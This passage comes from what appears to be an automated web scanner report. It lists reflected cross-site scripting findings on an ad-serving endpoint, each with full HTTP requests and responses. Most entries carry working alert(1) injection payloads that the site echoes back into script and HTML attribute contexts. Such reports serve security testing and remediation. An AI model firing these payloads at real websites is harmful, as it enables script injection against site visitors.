Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8063
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:14:14 GMT

<html><head><title>mdfNOKIA_Fall_300x250_100110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
58257();
var _CIN1285876358257_Instance =
{
click : "http://ad.trafficmp.com/a/click?_-611797114104433*_3107*Qmw_99*YEw_115*BQz_3443735*mta_3247**13gzvnh8od021___3533310**0_3805*mDQ_114**_-8628394438fd41"-alert(1)-"f885d948866",
clickThruUrl: "http://clk.redcated/go/245130801/direct;wi.300;hi.250;ai.185129827;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.695. http://redcated/CNT/iview/262688153/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/262688153/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48924'%3b15be0cc3faa was submitted in the REST URL parameter 4. This input was echoed as 48924';15be0cc3faa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/262688153/direct48924'%3b15be0cc3faa;wi.300;hi.250/01/5540470670496712704?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-862839443 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290349415579&cm=191&ac=5&at=2&xvk=33016075.31214688&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7960
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:24:10 GMT

<html><head><title>100909_22_UTV_THDVR_Walk_100_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCP9/CT_9_8_2010/100909_22_UTV_THDVR_Walk_100_300x250.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/262688153/direct48924';15be0cc3faa;wi.300;hi.250;ai.181690488;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/262688153/direct48924';15be0cc3faa;wi.300;hi.250;ai.181690488;ct.1/01" />
...[SNIP]...

2.696. http://redcated/CNT/iview/262688153/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/262688153/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94e9e"-alert(1)-"d1f3ee380e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/262688153/direct;wi.300;hi.250/01/5540470670496712704?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-862839443&94e9e"-alert(1)-"d1f3ee380e0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290349415579&cm=191&ac=5&at=2&xvk=33016075.31214688&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7953
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:24:00 GMT

<html><head><title>100909_22_UTV_THDVR_Walk_100_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:
...[SNIP]...
();

var _CP91283976644426_Instance =
{
click : "http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-862839443&94e9e"-alert(1)-"d1f3ee380e0=1",
clickThruUrl: "http://clk.redcated/go/262688153/direct;wi.300;hi.250;ai.181690488;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : f
...[SNIP]...

2.697. http://redcated/CNT/iview/262688153/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/262688153/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8524e'-alert(1)-'5f161bb7851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/262688153/direct;wi.300;hi.250/01/5540470670496712704?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-862839443&8524e'-alert(1)-'5f161bb7851=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290349415579&cm=191&ac=5&at=2&xvk=33016075.31214688&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7632
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:24:00 GMT

<html><head><title>100708_9_BUN_TPL_Adventure_U100_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wid
...[SNIP]...
= _strContentCP91278516093674.replace(/!~!click!~!/g,'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-862839443&8524e'-alert(1)-'5f161bb7851=1');
}
else
{
_strContentCP91278516093674 = '<a target="_blank" href="http://clk.atdmt.com/go/262688153/direct;wi.300;hi.250;ai.172732696;ct.1/01/" onclick="if(\'http://ad.trafficmp.com/a/click
...[SNIP]...

2.698. http://redcated/CNT/iview/262688153/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/262688153/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c1fc"><script>alert(1)</script>1e96f8a1e3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/262688153/direct;wi.300;hi.250/01/5540470670496712704?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-862839443&2c1fc"><script>alert(1)</script>1e96f8a1e3a=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290349415579&cm=191&ac=5&at=2&xvk=33016075.31214688&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8025
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:23:57 GMT

<html><head><title>100909_22_UTV_THDVR_Walk_100_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:
...[SNIP]...
ect;wi.300;hi.250;ai.181690488;ct.1/01/" onclick="if(\'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-862839443&2c1fc"><script>alert(1)</script>1e96f8a1e3a=1\')(new Image).src=\'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-862839443&2c1fc">
...[SNIP]...

2.699. http://redcated/CNT/iview/262688153/direct [wi.300;hi.250/01/5540470670496712704?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/262688153/direct

Issue detail

The value of the wi.300;hi.250/01/5540470670496712704?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5132a"-alert(1)-"c6a1866a1a8 was submitted in the wi.300;hi.250/01/5540470670496712704?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/262688153/direct;wi.300;hi.250/01/5540470670496712704?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-8628394435132a"-alert(1)-"c6a1866a1a8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290349415579&cm=191&ac=5&at=2&xvk=33016075.31214688&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7614
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:23:53 GMT

<html><head><title>100708_9_BUN_TPL_Adventure_U100_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wid
...[SNIP]...
93674();
var _CP91278516093674_Instance =
{
click : "http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-8628394435132a"-alert(1)-"c6a1866a1a8",
clickThruUrl: "http://clk.redcated/go/262688153/direct;wi.300;hi.250;ai.172732696;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.700. http://redcated/CNT/iview/262688153/direct [wi.300;hi.250/01/5540470670496712704?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/262688153/direct

Issue detail

The value of the wi.300;hi.250/01/5540470670496712704?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e6a4"><script>alert(1)</script>8a5858bee3f was submitted in the wi.300;hi.250/01/5540470670496712704?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/262688153/direct;wi.300;hi.250/01/5540470670496712704?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-8628394433e6a4"><script>alert(1)</script>8a5858bee3f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290349415579&cm=191&ac=5&at=2&xvk=33016075.31214688&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7691
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:23:52 GMT

<html><head><title>100708_9_BUN_TPL_Adventure_U100_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wid
...[SNIP]...
rect;wi.300;hi.250;ai.172732696;ct.1/01/" onclick="if(\'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-8628394433e6a4"><script>alert(1)</script>8a5858bee3f\')(new Image).src=\'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-8628394433e6a4">
...[SNIP]...

2.701. http://redcated/CNT/iview/262688153/direct [wi.300;hi.250/01/5540470670496712704?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/262688153/direct

Issue detail

The value of the wi.300;hi.250/01/5540470670496712704?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e029'-alert(1)-'5213fec8886 was submitted in the wi.300;hi.250/01/5540470670496712704?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/262688153/direct;wi.300;hi.250/01/5540470670496712704?click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-8628394432e029'-alert(1)-'5213fec8886 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://media.adfrontiers.com/pq?t=f&s=486&ts=1290349415579&cm=191&ac=5&at=2&xvk=33016075.31214688&fd=t&tc=1&rr=t
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7935
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:23:56 GMT

<html><head><title>100909_22_UTV_THDVR_Walk_100_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:
...[SNIP]...
6 = _strContentCP91283976644426.replace(/!~!click!~!/g,'http://ad.trafficmp.com/a/click?_-611797114104433*_3107*lmIS_99*avZ_115*xAh_3443735*mta_3247**agb8qwzm2dvr___3533310**0_3805*mko_114**_-8628394432e029'-alert(1)-'5213fec8886');


}
else
{
_strContentCP91283976644426 = '<a target="_blank" href="http://clk.atdmt.com/go/262688153/direct;wi.300;hi.250;ai.181690488;ct.1/01/" onclick="if(\'http://ad.trafficmp.com/a/c
...[SNIP]...

2.702. http://redcated/CNT/iview/276779679/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/276779679/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c38ac'%3b48e0b71d927 was submitted in the REST URL parameter 4. This input was echoed as c38ac';48e0b71d927 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779679/directc38ac'%3b48e0b71d927 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7116
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:37 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Quantum_Launch_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px
...[SNIP]...
m name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCBR/11_5_2010_2010_Youth_Windows_Phone_7/ATT_YTH_WP7_Quantum_Launch_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/276779679/directc38ac';48e0b71d927;ai.189705351;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/276779679/directc38ac';48e0b71d927;ai.189705351;ct.1/01" />
...[SNIP]...

2.703. http://redcated/CNT/iview/276779679/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779679/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c669"-alert(1)-"65ece8fc51f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779679/direct;wi.728;hi.90/01/207125146?click=http://at.atwola.com/adlink/5113/1151103/0/225/AdId=1257208;BnId=2;itime=207125146;kvpg=aolnews%2Fsearch;kvmn=93305196;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\&7c669"-alert(1)-"65ece8fc51f=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8424
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:22 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Focus_Launch_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;m
...[SNIP]...
0/225/AdId=1257208;BnId=2;itime=207125146;kvpg=aolnews%2Fsearch;kvmn=93305196;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\&7c669"-alert(1)-"65ece8fc51f=1",
clickThruUrl: "http://clk.redcated/go/276779679/direct;wi.728;hi.90;ai.189705251;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : fu
...[SNIP]...

2.704. http://redcated/CNT/iview/276779679/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779679/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41aa8"><script>alert(1)</script>4683dfb8e38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/276779679/direct;wi.728;hi.90/01/207125146?click=http://at.atwola.com/adlink/5113/1151103/0/225/AdId=1257208;BnId=2;itime=207125146;kvpg=aolnews%2Fsearch;kvmn=93305196;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\&41aa8"><script>alert(1)</script>4683dfb8e38=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8510
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:22 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Surround_Launch_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0p
...[SNIP]...
0/225/AdId=1257208;BnId=2;itime=207125146;kvpg=aolnews%2Fsearch;kvmn=93305196;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\&41aa8"><script>alert(1)</script>4683dfb8e38=1\')(new Image).src=\'http://at.atwola.com/adlink/5113/1151103/0/225/AdId=1257208;BnId=2;itime=207125146;kvpg=aolnews%2Fsearch;kvmn=93305196;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:6
...[SNIP]...

2.705. http://redcated/CNT/iview/276779679/direct [wi.728;hi.90/01/207125146?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779679/direct

Issue detail

The value of the wi.728;hi.90/01/207125146?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e506c</script><script>alert(1)</script>82118039e98 was submitted in the wi.728;hi.90/01/207125146?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779679/direct;wi.728;hi.90/01/207125146?click=http://at.atwola.com/adlink/5113/1151103/0/225/AdId=1257208;BnId=2;itime=207125146;kvpg=aolnews%2Fsearch;kvmn=93305196;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\e506c</script><script>alert(1)</script>82118039e98 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8529
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:07 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Quantum_Launch_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px
...[SNIP]...
/0/225/AdId=1257208;BnId=2;itime=207125146;kvpg=aolnews%2Fsearch;kvmn=93305196;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\e506c</script><script>alert(1)</script>82118039e98",
clickThruUrl: "http://clk.redcated/go/276779679/direct;wi.728;hi.90;ai.189705351;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : func
...[SNIP]...

2.706. http://redcated/CNT/iview/276779679/direct [wi.728;hi.90/01/207125146?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779679/direct

Issue detail

The value of the wi.728;hi.90/01/207125146?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45eb'-alert(1)-'f8d3ea20e84 was submitted in the wi.728;hi.90/01/207125146?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779679/direct;wi.728;hi.90/01/207125146?click=http://at.atwola.com/adlink/5113/1151103/0/225/AdId=1257208;BnId=2;itime=207125146;kvpg=aolnews%2Fsearch;kvmn=93305196;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\e45eb'-alert(1)-'f8d3ea20e84 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8419
